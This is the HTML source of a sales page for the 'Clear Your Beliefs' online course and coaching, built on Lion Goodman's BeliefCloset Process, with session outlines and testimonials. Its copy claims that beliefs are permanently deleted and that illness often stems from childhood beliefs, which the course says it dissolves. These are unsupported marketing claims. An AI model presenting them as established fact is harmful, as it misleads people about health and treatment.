src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 